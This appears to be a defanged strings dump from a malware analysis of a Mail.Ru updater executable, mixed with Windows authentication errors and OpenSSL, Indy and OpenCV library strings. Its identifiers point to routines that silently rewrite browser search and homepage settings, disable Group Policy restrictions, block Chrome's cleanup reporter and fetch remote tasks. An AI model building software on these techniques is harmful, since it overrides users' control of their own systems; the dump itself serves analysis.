The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.bClient policy does not allow credential delegation to target server with NLTM only authentication.
KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY5The certificate is not valid for the requested usage.
:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.9The number of maximum ticket referrals has been exceeded.
4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
Failed to load %s.
SSL status: "%s"
%s Alert
%s Read Alert
%s Write Alert
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate*Missing a Low Surrogate in UTF-16 sequence
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
"%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid property type: %s
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property element: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
''%s'' expected
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
I/O error %d
The OpenSSL Project, hXXp://VVV.openssl.org/
1.0.2e
Compiled by Frederik A. Winkelsdorf (opendec.wordpress.com) for the Indy Project (VVV.indyproject.org)
()* ,|-.

MailRuUpdater.exe_1632:

.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
.EKSWU
DlSHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>
FtPS
FTPG
FTPj
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by <appro@openssl.org>
|$@3|$<3
Camellia for x86 by <appro@openssl.org>
RC4 for x86, CRYPTOGAMS by <appro@openssl.org>
<0|1<:}-
<0|9<:}5
w%s( 
8%u(j
uXj.hLj
ugj.hLj
gj.hdi
 FTPj
F\ FTP
<x%uY
><%uB
t.Jx 
;*u%C
Lj.hL
j.Yf;
_tcPVj@
.PjRW
f;F.se
?sqliu
 2 34 567
?%Y-%u
m-%du
?%H:%u
M:%Su
C:\desktop_apps\SputnikLib/log_ng.h
C:\desktop_apps\CommonFiles/url_params_common.hpp
mailru::url_params::formalize_common_params
mailru::url_params::AddWinVerInfo
mailru::url_params::AddChromeMetrics
mailru::url_params::AddToolVer
mailru::url_params::AddOtherProcessInfo
..\CommonFiles\audit\audit.cpp
..\CommonFiles\audit\audit_browsers_manager.cpp
c:\desktop_apps\commonfiles\audit\audit_browsers_manager.h
ReportTime
..\CommonFiles\audit\audit_browser_settings.cpp
mailru::AuditBrowserSettings::MakeReport
) report successfully done
Make report failed
mailru::AuditBrowserSettings::ScheduleReportCheck
mailru::AuditBrowserSettings::CollectReportInfo
mailru::AuditBrowserSettings::CheckReport
error report structer
..\CommonFiles\audit\audit_google_chrome.cpp
mailru::AuditGoogleChrome::CheckerHomepageCh::RestoreChild
mailru::AuditGoogleChrome::CheckerDefaultSearchCh::RestoreChild
mailru::AuditGoogleChrome::CheckerVbmCh::RestoreChild
:Incorrect key length
Unable to read chrome blocklist
Chrome blocklist file is not valid
chrome blocklist contains unsupported elements
..\CommonFiles\chrome-safe-browsing.cpp
mailru::chromium::ChromeSafeBrowsing::ReadSafeBrowsingFile
shard_header.add_prefix_count > kMaxAddSubChunksCount
Unable to open "%s" for writing
RegCreateKeyTransactedW
C:\desktop_apps\SputnikLib/reg_key.hpp
startup_urls
urls_to_restore_on_startup
..\commonfiles\chromiums.cpp
Chrome
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
KERNEL32.DLL
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
%%%%-%%%%-%%%%-%%%%
C:\desktop_apps\CommonFiles/sql_lite_bind.hpp
..\CommonFiles\chromium_settings.cpp
hXXp://mail.ru
hXXp://VVV.mail.ru
browser.show_home_button
session.restore_on_startup
yandex\.ru. clid
mailru::chromium::settings::search_url
chrome_settings_overrides
search_url
template_url_data
mailru::chromium::settings::search_url_without_extensions
@MAIL.RU
suggestions_url
suggestions_url_post_params
windows-1251
keyword
mail.ru
D15371FE-C188-4E99-9841-A91F3BCBCCC3
search_terms_replacement_key
search_url_post_params
favicon_url
hXXp://go.mail.ru/favicon.ico
image_url
image_url_post_params
instant_url
instant_url_post_params
originating_url
alternate_urls
default_search_provider_data.template_url_data
suggest_url
default_search_provider.name
default_search_provider.search_url
go.mail.ru
keystore_encryption_bootstrap_token
chrome_url_overrides
chrome-extension://
extensions.settings.
hXXp://mail.ru/cnt/9824
mail.ru
mailru::chromium::settings::url_from_ext_id
extensions.known_disabled
error %s
update_url
.enabled
hXXp://xml.binupdate.mail.ru/amigo/check_policy.amg?
check_policy.amg not loaded
check_policy.amg NOT decoded
check_policy.amg NOT parsed
mailru::chromium::settings::InstallExtensionFromUrlNoThrow
Disabling dse in GPO failed: %s
Looking for local GPO failed: %s
yasearch.native_comps.hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox.all.settings.searchName
hXXp://VVV.mail.ru/cnt/7861
hXXp://agent.mail.ru/ru/download/agent_windows/download.html?sputnik=1
hXXp://img.imgsmail.ru/r/agent/favicon.ico
hXXp://mail.ru/cnt/10445
hXXp://VVV.mail.ru/
hXXp://go.mail.ru/search?fr=ntg&q={SearchTerms}
hXXp://go.mail.ru/search?fr=ntg&q=
hXXp://m.mail.ru/cgi-bin/splash?opera=1
hXXp://VVV.mail.ru/cnt/5090
hXXp://go.mail.ru/search?q=%s&fr=ntg
@mail.ru
hXXp://suggests.go.mail.ru/ff3?q={SearchTerm}
hXXp://go.mail.ru/search_images?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_images.ico
hXXp://go.mail.ru/search_video?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_video.ico
hXXp://VVV.mail.ru/cnt/5091
hXXp://redir.opera.com/speeddials/mail.ru
hXXp://redir.opera.com/bookmarks/mail.ru
hXXp://go.mail.ru/search?q=%s&fr=opr11
hXXp://go.mail.ru/search?q={SearchTerms}&fr=ntg
hXXp://suggests.go.mail.ru/ff3?q={searchTerms}
hXXp://mail.ru/cnt/10226
hXXp://go.mail.ru/?pin=1
mailru::default_browser::find_executable
..\CommonFiles\default_browser.cpp
C:\desktop_apps\SputnikLib/com_scope.h
SHORTCUTS PROSEED ERROR: std exception = %s
..\commonfiles\file_util.cpp
C:\desktop_apps\3party\ticpp/ticpp.h
..\CommonFiles\firefox_settings.cpp
mailru::firefox::settings::~settings
browser.startup.homepage
Profile%d
hXXp://go.mail.ru
browser.search.selectedEngine
browser.search.defaultenginename
browser.search.defaulturl
keyword.URL
extensions.enabledAddons
mailru::firefox::settings::is_yandex_elements_intsalled
yasearch@yandex.ru
mailru::firefox::settings::remove_media_viewer
browser.search.suggest.enabled
browser.search.useDBForOrder
Firefox
..\CommonFiles\Firefox_visual_bookmarks.cpp
mailru::firefox::visual_bookmarks::install
mailru::firefox::visual_bookmarks::download
urn:mozilla:item:
mailru::firefox::visual_bookmarks::localstore_rdf
chrome://browser/content/browser.xul#mailru_main_toolbar
(\s*app-profile\s \{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s rel%\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s \d )\s*.*
partner_new_url
partner_online_url
hXXps://xtnmailru.cdnmail.ru/go_ffvbm1_update.rdf
chrome://vbmail.ru/skin/vb-logo.png
extensions.autoDisableScopes
extensions.shownSelectionUI
mailru::firefox::enable_visual_bookmarks::PatchExtensionSqlite
mailru::firefox::enable_visual_bookmarks::PatchExtensionIni
mailru::firefox::enable_visual_bookmarks::PatchExtensionJson
updateURL
updateKey
optionsURL
aboutURL
iconURL
icon64URL
Mail.Ru
homepageURL
hXXp://sputnik.mail.ru/
{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
mailru::firefox::enable_visual_bookmarks::is_enabled
mailru::firefox::enable_visual_bookmarks::PatchFileTime
..\CommonFiles\GPOManager.cpp
GetRegistryKey for machine failed
GetRegistryKey for user failed
?mailru::sqlite_bind::column_int64
search_id() = %s
HKEY_USERS ie search url = %s
HKEY_LOCAL_MACHINE ie search url = %s
..\CommonFiles\ie_settings.cpp
Disabling GPO restrictions failed: %s
mailru::reg_keyT<0>::check
ntdll.dll
kernel32.dll
..\CommonFiles\Install_stat.cpp
..\CommonFiles\savestate.cpp
web_data_ver
save_google_state_task::do_task error : item_in_storage.file_serialize
..\CommonFiles\shortcut_check.cpp
c:\desktop_apps\commonfiles\tasks\TaskShortcuts.h
..\CommonFiles\Tasks\RemoteTaskExecuter.cpp
mailru::RemoteTasksExecuter::InitTasks
mailru::RemoteTasksExecuter::ExecuteTask
mailru::RemoteTasksExecuter::FetchTasks
Fetching tasks.mrdj...
Fetching url =
google chrome sync_enabled
..\CommonFiles\Tasks\TaskEmulateWebStoreInstallation.cpp
ERROR google_blocked_mailru_extensions_base::ProceedExtensions std::exception %s !!!
..\CommonFiles\Tasks\TaskGoogleBlockedMailruSettings.cpp
ChromeVbmId
ChromeVbmArchive
..\CommonFiles\Tasks\TaskInstallUpdater.cpp
..\CommonFiles\Tasks\TaskInterface.cpp
..\CommonFiles\Tasks\TaskInstallUpdaterAsService.cpp
cmd_line =
..\CommonFiles\Tasks\TaskPeriodicDisableGPO.cpp
14000000000000000
..\CommonFiles\Tasks\TaskPreventSRT.cpp
mailru::TaskPreventSRT::SendReporterMetric
software_reporter
ReporterLogPattern
invalid map<K, T> key
ERROR: chrome_value is empty
..\CommonFiles\Tasks\TaskRemovePornExtensions.cpp
..\CommonFiles\Tasks\TaskRestoreFFDse.cpp
..\CommonFiles\Tasks\TaskStartGroupBlackList.cpp
mailru::TaskStartGroupBlackList::ProceedGoogleChrome
ProceedGoogleChrome patch prepared
ProceedGoogleChrome start patching
google_chrome object constructed
Google Chrome settings are synced
Google Chrome extensions are synced
TaskStartGroupBlackList::ProceedGoogleChrome failed, error =
ProceedGoogleChrome patch_util.set_was_patch(true);
mailru::TaskStartGroupBlackList::CleanUpChromeStartPages
mailru::TaskStartGroupBlackList::ProceedFirefox
ProceedFirefox is running
hXXp://go.mail.ru/?ffverfix=1&fr=ffverfix_sg
TaskStartGroupBlackList::ProceedGoogleChrome failed, er =
TaskStartGroupBlackList::ProceedGoogleChrome failed
hXXp://go.mail.ru/?ieverfix=1&fr=ieverfix_sg
..\CommonFiles\tasks\task_amigo_remove_pinned_tabs.cpp
..\CommonFiles\Tasks\task_change_sic_settings.cpp
..\CommonFiles\tasks\task_user_preferences.cpp
mailru::TaskUserPreferences::AnalyzeFirefox
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox
Error reading yandex plugin config: %s
Error changing yandex smartbar config: %s
Error disabling yandex smartbox plugin: %s
..\CommonFiles\yandex_elements.cpp
class Json::Value *__thiscall mailru::YandexElements::FindSettingInStateConfig(class Json::Value &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &) const
Error reading yandex config setting "%s": %s
browser.uiCustomization.state
Error enabling standard search panel: %s
guid_manager.cpp
installer.cpp
mailru::reg_keyT<0>::throw_on_error
main.cpp
Started with cmd line
c:\desktop_apps\mailruupdater\concrete_update_task.hpp
self_update_task.cpp
SendBrowsersStatistic.cpp
c:\desktop_apps\mailruupdater\SendBrowsersStatistic.h
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_amigo>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_mail>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_google>::getDSEurl
service.cpp
asio.misc
asio.misc error
C:\desktop_apps\3party\boost_1_56_0\boost/exception/detail/exception_ptr.hpp
update_info.cpp
fetch_url
Program fetch url
md5 fetch url
cmd_line
util.cpp
updater::Util::SaveChromeStateTask
SHA-256 part of OpenSSL 1.0.0g 18 Jan 2012
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
SHA1 part of OpenSSL 1.0.0g 18 Jan 2012
SHA-512 part of OpenSSL 1.0.0g 18 Jan 2012
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
RSA part of OpenSSL 1.0.0g 18 Jan 2012
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
Stack part of OpenSSL 1.0.0g 18 Jan 2012
Big Number part of OpenSSL 1.0.0g 18 Jan 2012
lhash part of OpenSSL 1.0.0g 18 Jan 2012
ASN.1 part of OpenSSL 1.0.0g 18 Jan 2012
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
RAND part of OpenSSL 1.0.0g 18 Jan 2012
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
%d.%d.%d.%d
EC part of OpenSSL 1.0.0g 18 Jan 2012
ECDSA part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\ec\ec_key.c
DSA part of OpenSSL 1.0.0g 18 Jan 2012
Diffie-Hellman part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\dh\dh_key.c
value.single
value.set
USER32.DLL
NETAPI32.DLL
ADVAPI32.DLL
keylength
keyfunc
EVP part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\pkcs12\p12_key.c
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
ECDH part of OpenSSL 1.0.0g 18 Jan 2012
priv_key
pub_key
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
<unsupported>
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:<unsupported>
X400Name:<unsupported>
othername:<unsupported>
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
CONF part of OpenSSL 1.0.0g 18 Jan 2012
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
%d.%d.%d.%d/%d.%d.%d.%d
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
keyid
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
d.other
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
pubkey
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
x%s
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
cert_info
\X
'() ,-./:=?
CONF_def part of OpenSSL 1.0.0g 18 Jan 2012
[[%s]]
[%s] %s=%s
MD5 part of OpenSSL 1.0.0g 18 Jan 2012
PROXY_CERT_INFO_EXTENSION
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
certs
%s - d:d:d%.*s %d%s
AUTHORITY_KEYID
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
.\crypto\evp\evp_pkey.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
X.509 part of OpenSSL 1.0.0g 18 Jan 2012
OPENSSL_ALLOW_PROXY_CERTS
X509_CERT_PAIR
X509_CERT_AUX
%s.dll
%lu:%s:%s:%d:%s
ddddddZ
ddddddZ
PEM part of OpenSSL 1.0.0g 18 Jan 2012
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
?456789:;<=
!"#$%&'()* ,-./0123
Verifying - %s
D:\Libs\opencv\sources\modules\core\include\opencv2/core/mat.inl.hpp
D:\Libs\opencv\sources\modules\imgproc\src\templmatch.cpp
img.dims <= 2 && templ.dims <= 2 && corr.dims <= 2
corrsize.height <= img.rows   templ.rows - 1 && corrsize.width <= img.cols   templ.cols - 1
(depth == CV_8U || depth == CV_32F) && type == _templ.type() && _img.dims() <= 2
_img.size().height <= _templ.size().height && _img.size().width <= _templ.size().width
D:\Libs\opencv\sources\modules\imgproc\src\sumpixels.cpp
D:\Libs\opencv\sources\modules\core\src\alloc.cpp
D:\Libs\opencv\sources\modules\core\src\matrix.cpp
m.dims >= 2
0 <= _rowRange.start && _rowRange.start <= _rowRange.end && _rowRange.end <= m.rows
0 <= _colRange.start && _colRange.start <= _colRange.end && _colRange.end <= m.cols
m.dims <= 2
0 <= roi.x && 0 <= roi.width && roi.x   roi.width <= m.cols && 0 <= roi.y && 0 <= roi.height && roi.y   roi.height <= m.rows
r == Range::all() || (0 <= r.start && r.start < r.end && r.end <= m.size[i])
COI is not supported by the function
0 <= i && i < (int)vv.size()
0 <= i && i < (int)v.size()
Unknown/unsupported array type
i < (int)vv.size()
(size_t)i < vv.size()
!fixedSize() || ((Mat*)obj)->size.operator()() == _sz
!fixedSize() || ((UMat*)obj)->size.operator()() == _sz
!fixedSize() || ((Mat*)obj)->size.operator()() == Size(_cols, _rows)
!fixedSize() || ((UMat*)obj)->size.operator()() == Size(_cols, _rows)
CV_MAT_TYPE(mtype) == m.type()
m.dims == d
m.size[j] == sizes[j]
d == 2 && ((sizes[0] == sz.height && sizes[1] == sz.width) || (allowTransposed && sizes[0] == sz.width && sizes[1] == sz.height))
!fixedSize() || len == vv.size()
Vectors with element size %d are not supported. Please, modify OutputArray::create()
v[j].empty()
i < (int)v.size()
checkScalar(value, type(), arr.kind(), _InputArray::CUDA_GPU_MAT)
_m.dims() <= 2
_src.dims() <= 2 && esz <= 32
src.size() == dst.size() && (src.cols == 1 || src.rows == 1)
dst.cols == dst.rows
m.dims <= 2 && m.rows == m.cols
_src.dims() <= 2
A.size == arrays[i0]->size
A.step[d-1] == A.elemSize()
%s:%d: error: (%d) %s in function %s
%s:%d: error: (%d) %s
OpenCV Error: %s (%s) in %s, file %s, line %d
Inplace operation is not supported
Input image depth is not supported by function
Unsupported format or combination of formats
Input COI is not supported
No CUDA support
No OpenGL support
Unknown %s code %d
D:\Libs\opencv\sources\modules\core\src\system.cpp
tlsKey != TLS_OUT_OF_INDEXES
cv::TLSContainerStorage::releaseKey
key_ >= 0
D:\Libs\opencv\sources\modules\core\src\convert.cpp
j < nsrcs && src[j].depth() == depth
i1 >= 0 && j < ndsts && dst[j].depth() == depth
D:\Libs\opencv\sources\modules\core\src\copy.cpp
mask.depth() == CV_8U && (mcn == 1 || mcn == cn)
size() == mask.size()
checkScalar(value, type(), _value.kind(), _InputArray::MAT )
mask.empty() || (mask.type() == CV_8U && size == mask.size)
Unknown/unsupported border type
src.depth() == dst.depth() && src.size == dst.size
(coi1 != 0 || src.channels() == 1) && (coi2 != 0 || dst.channels() == 1)
src.channels() == dst.channels()
D:\Libs\opencv\sources\modules\core\src\matop.cpp
CV_MAT_CN(_type) == e.a.channels()
Unknown operation
D:\Libs\opencv\sources\modules\core\src\arithm.cpp
The operation is neither 'array op array' (where arrays have the same size and type), nor 'array op scalar', nor 'scalar op array'
(mtype == CV_8U || mtype == CV_8S) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same number of channels), nor 'array op scalar', nor 'scalar op array'
type2 == CV_64F && (sz2.height == 1 || sz2.height == 4)
(mtype == CV_8UC1 || mtype == CV_8SC1) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same type), nor 'array op scalar', nor 'scalar op array'
